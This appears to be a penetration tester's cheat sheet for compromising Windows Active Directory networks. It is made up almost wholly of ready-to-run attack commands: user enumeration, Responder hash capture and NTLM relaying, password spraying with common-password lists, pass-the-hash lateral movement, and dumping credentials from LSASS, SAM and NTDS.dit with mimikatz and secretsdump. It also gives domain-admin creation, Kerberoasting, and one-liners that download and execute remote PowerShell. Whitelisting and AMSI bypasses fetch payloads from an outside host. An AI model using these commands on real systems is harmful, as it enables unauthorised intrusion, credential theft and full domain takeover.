Handy if you have generated a list from linkedin or a list of usernames.

`nmap -p 88 1.1.1.1 --script krb5-enum-users --script-args krb5-enum-users.realm="DOMAIN"`

username list is located at `/usr/local/share/nmap/nselib/data/usernames.lst` in Kali

### Null sessions

Still works on infra that was upgraded from 2k, 2k3.

`net use \\IP_ADDRESS\ipc$ "" /user:""`

Use enum4linux, enum or Dumpsec following the null session setup.

### GPP

https://bitbucket.org/grimhacker/gpppfinder/src/master/

`findstr /S /I cpassword \\\sysvol\\policies\*.xml`

## situational awareness

https://github.com/dafthack/HostRecon

Privesc checks:
https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation

## Network Attacks

### Responder

Grab NetNTLM hashes off the network

#### Without wpad:

`responder -I eth0`

#### With wpad:

`responder -I eth0 --wpad -b -f -F`

#### Filter logs from logs folder and remove machine accounts:

`sort -m *.txt | uniq -d | awk '!/\$/'`

#### Cracking with John:

`john SMB-NTLMv2-Client-172.20.22.217.txt --wordlist=/root/passwords.txt`

Use hashcat on a more powerful box. This is only for easy wins.

#### NTLM Relaying

`ntlmrelayx.py -tf targets.txt -c `

### MITM6

`python mitm6.py -d blah.local`

#### Capture hashes

`impacket-smbserver hiya /tmp/ -smb2support`

## Bruteforce domain passwords
### Common Passwords

$Company1
$Season$Year
Password1
Password!
Welcome1
Welcome!
Welcome@123
P@55word
P@55w0rd
$month$year

### Using hydra

`hydra -L users.txt -p Password1 -m 'D' 172.20.11.55 smbnt -V`

### Bruteforce using net use

`@FOR /F %n in (users.txt) DO @FOR /F %p in (pass.txt) DO @net use \\DOMAINCONTROLLER\IPC$ /user:DOMAIN\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\DOMAINCONTROLLER\IPC$ > NUL`

### all systems

`net view /domain > systems.txt`

### Local admin search using net use

`@FOR /F %s in (systems.txt) DO @net use \\%s\C$ /user:domain\username
Password 1>NUL 2>&1 && @echo %s>>admin_access.txt && @net use
/delete \\%s\C$ > NUL`

### Domain joined machine

`Invoke-DomainPasswordSpray -Password Spring2017`

## Non-domain joined testing

When you have an initial set of compromised creds run these from a Virtual Machine to place foothold on network as domain user.

### Shell with domain user privileges
`C:\runas.exe /netonly /user:BLAHDOMAIN\blahuser cmd.exe`

`runas /netonly /user:[email protected] "mmc %SystemRoot%\system32\dsa.msc`

Make sure you use the FQDN of the domain and set the reg key as below.

### check dc:
`nltest /dsgetdc:domain.local`

To change DC via registry to point at domain being tested:

HKEY_LOCAL_MACHINE
SYSTEM
CurrentControlSet
Services
Netlogon
Parameters
“SiteName“ > DC1.domain.com

### Create session for use with dumpsec
`net use \\10.0.0.1\ipc$ /user:domain.local\username password`

### Quick User lists and password policy enum

`net users /domain`

`net group /domain "Domain Admins"`

`net accounts /domain`

Note that the above commands do not work with runas. Below PowerView functions will work with runas.

### Powerview:

`. .\PowerView.ps1`

`Get-UserProperty -Properties samaccountname`

`Get-NetGroupMember`

`Get-DomainPolicy`

Search shares and files using Invoke-FileFinder and Invoke-ShareFinder

## Domain Analysis

### BloodHound

Run locally on non-domain joined machine (remember to add target domain to registry):

``..\BloodHound.ps1``

``Invoke-BloodHound``

### SharpHound

`SharpHound.exe --CollectionMethod All`

### Run from remote shell

Useful when you have a remote shell.

`powershell Set-ExecutionPolicy RemoteSigned`

`powershell -command "& { . C:\BloodHound.ps1; Invoke-BloodHound }"`

### Run from web server or over Internet:

Use this when you cannot copy BloodHound.ps1 over to target.

`powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/PowerShell/BloodHound.ps1'); Invoke-BloodHound"`

### Run using Sharppick - AMSI bypass

SharpPick.exe -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1'); Invoke-BloodHound"

`SharpPick-64.exe -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1'); Invoke-AllChecks"`

### Goddi (fast dump all domain info)

`.\godditest-windows-amd64.exe -username=testuser -password="testpass!" -domain="test.local" -dc="dc.test.local" -unsafe`

### ADRecon (More detailed - Good for AD Auditing)

https://github.com/sense-of-security/ADRecon

### Share and file finder
`Invoke-ShareFinder -CheckShareAccess -Verbose -Threads 20 |
Out-File -Encoding Ascii interesting-shares.txt`

`Invoke-FileFinder -ShareList .\interesting-shares.txt -Verbose -Threads
20 -OutFile juicy_files.csv`

### Eyewitness
docker run --rm -it -v /tmp/blah:/tmp/EyeWitness eyewitness --web --single https://www.google.com

### Windows priv esc

https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/

## Compromise and Lateral Movement

### Crackmapexec

`crackmapexec smb 172.16.110.0/24`

`crackmapexec smb 172.16.110.154 -u Administrator -p Password1 -x 'ipconfig'`

`crackmapexec smb 172.16.110.154 -u Administrator -p Password1 --pass-pol`

`crackmapexec smb 172.16.110.154 -u Administrator -p Password1 -M mimikatz`

`crackmapexec smb 172.16.110.154 -u Administrator -p Password1 --sam`

`crackmapexec smb 172.16.110.154 -u Administrator -p Password1 --lsa`

### Winexe to boxes (not opsec safe) - service is run. No cleanup.

`pth-winexe //10.0.0.1 -U DOMAIN/zdefense/blahuser%blahpassword cmd`

`pth-winexe //10.0.0.1 -U DOMAIN/zdefense/blahuser%hash cmd`

### Impacket psexec.py to boxes (not opsec safe) - does cleanup after but leaves logs after installing and running service.

`psexec.py user@IP`

`psexec.py user@IP -hashes ntlm:hash`

### Impacket wmiexec.py (opsec safe - unless WMI logging is enabled)

`wmiexec.py domain/user@IP`

`wmiexec.py domain/user@IP -hashes ntlm:hash`

### Impacket smbclient (probably opsec safe as its just using SMB)

`python smbclient.py domain/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:blah`

## RDP Pass the Hash
Using mimikatz:

`privilege::debug`
`sekurlsa::pth /user: /domain: /ntlm: /run:"mstsc.exe /restrictedadmin"`

If disabled:

`sekurlsa::pth /user: /domain: /ntlm: /run:powershell.exe`
`Enter-PSSession -Computer `
`New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force`

## Invoke the hash

`Invoke-WMIExec -Target blah -Username blah -Hash NTLMHASH -Command blah`

## Password dumping

### From Live Kali on a workstation
`samdump2 SYSTEM SAM > hashes.txt`

### Local

`C:\> reg.exe save hklm\sam c:\temp\sam.save`

`C:\> reg.exe save hklm\security c:\temp\security.save`

`C:\> reg.exe save hklm\system c:\temp\system.save`

`secretsdump.py -sam sam.save -security security.save -system system.save LOCAL`

`pwdump system sam`

### In Memory
`C:\> procdump.exe -accepteula -ma lsass.exe c:\lsass.dmp 2>&1`

`C:\> mimikatz.exe log "sekurlsa::minidump lsass.dmp" sekurlsa::logonPasswords exit`

`C:\>mini.exe`

https://github.com/b4rtik/ATPMiniDump

### From box

`mimikatz # privilege::debug`
`mimikatz # sekurlsa::logonPasswords full`

### Remote

`impacket-secretsdump Administrator@ip`
`impacket-secretsdump Administrator@ip -hashes ntlm:hash`

### Domain

To find where NTDS is run the below:

`reg.exe query hklm\system\currentcontrolset\services\ntds\parameters`

### vssadmin

`C:\vssadmin list shadows`

`C:\vssadmin create shadow /for=C:`

`copy \\? \GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\ntds\ntds.dit .`

`copy \\? \GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SYSTEM .`

`copy \\? \GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SAM .`

`secretsdump.py -system system.save -ntds ntds.dit local -just-dc-ntlm`

remove machine accounts

`grep -a -F ':::' hashes.txt | grep -av '$:' > finalhashes.txt`

only passwords for pipal

`cut -f 3 -d ':' cracked_with_users_enabled.txt`

`vssadmin delete shadows /shadow={cd534584-a272-44ab-81e1-ab3f5fbe9b29}`

godumpsecrets for faster

### ntdsutil

```
C:\>ntdsutil
ntdsutil: activate instance ntds
ntdsutil: ifm
ifm: create full c:\pentest
ifm: quit
ntdsutil: quit
```

`ntdsutil`

`ntdsutil: snapshot`

`ntdsutil: list all`

`ntdsutil: create`

`snapshot: mount 1`

Cleanup snapshots:

`snapshot: list all`

`snapshot: unmount 1`

`snapshot: list all`

`snapshot: delete 1`

## Post Compromise (Not opsec safe)
Add user to local admin and domain admin

### Add Domain Admin
`net user username password /ADD /DOMAIN`

`net group "Domain Admins" username /ADD /DOMAIN`

### Add Local Admin
`net user username password /ADD`

`net localgroup Administrators username /ADD`

### Tasklist scraper to find logged in admins

If powershell not enabled or unable to run BloodHound this script will find admins.

`#!/bin/sh`

`for ip in $(cat ip.txt);do`

`pth-winexe -U Admin%hash //$ip "ipconfig"`

`pth-winexe -U Admin%hash //$ip "tasklist /v"`

`done`

### Kerberoasting

`Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat`

https://raw.githubusercontent.com/xan7r/kerberoast/master/autokerberoast.ps1

Invoke-AutoKerberoast

`python autoKirbi2hashcat.py ticketfilefromautoinvokekerberoast`

`IEX (New-Object Net.WebClient).DownloadString('https://github.com/EmpireProject/Empire/raw/master/data/module_source/credentials/Invoke-Kerberoast.ps1'); Invoke-Kerberoast`

### Hashcat Alienware - kerbtgt hash cracking

`sudo apt-get install nvidia-367`

`sudo nvidia-smi`

`reboot`

`sudo hashcat -I`

`hashcat -m 13100 kerb.txt ~/Downloads/realuniq.lst`

### LAPS - GetLAPSPasswords

https://github.com/kfosaaen/Get-LAPSPasswords/blob/master/Get-LAPSPasswords.ps1

## Priv Esc
### Powerup

`IEX (New-Object Net.WebClient).DownloadString('https://github.com/PowerShellEmpire/PowerTools/raw/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks`

## File Transfer

### SMB Server in Kali

`python smbserver.py test /root/tools`

### Python Web Server

`python -m SimpleHTTPServer `

## Domain Fronting

https://blog.cobaltstrike.com/2017/02/06/high-reputation-redirectors-and-domain-fronting/
https://signal.org/blog/doodles-stickers-censorship/
https://www.securityartwork.es/2017/01/24/camouflage-at-encryption-layer-domain-fronting/
https://trac.torproject.org/projects/tor/wiki/doc/meek
http://bryceboe.com/2012/03/12/bypassing-gogos-inflight-internet-authentication/

## AWL bypasses

### Powershell without powershell.exe

`SharpPick.exe -d "http://zdefense/blah.ps1"`

### Squiblytwo

`wmic.exe os get /format:"http://zdefense/foo.xsl"`

### Sharpshooter

https://www.mdsec.co.uk/2018/03/payload-generation-using-sharpshooter/

`python SharpShooter.py --stageless --dotnetver 2 --payload js --output foo --rawscfile ./output/payload.bin --smuggle --template mcafee --com xslremote --awlurl http://ZDefense/foo.xsl`

### cypher queries

user to which box the user has localadmin

`MATCH (u:User)-[r:MemberOf|:AdminTo*1..]->(c:Computer) return u.name, collect(c.name)`

List of DAs
`Match p=(u:User)-[:MemberOf]->(g:Group) WHERE g.name= "DOMAIN ADMINS@ZDefense" return u.displayname`

https://downloads.skullsecurity.org/dnscat2/
https://github.com/lukebaggett/dnscat2-powershell
$ dnscat –host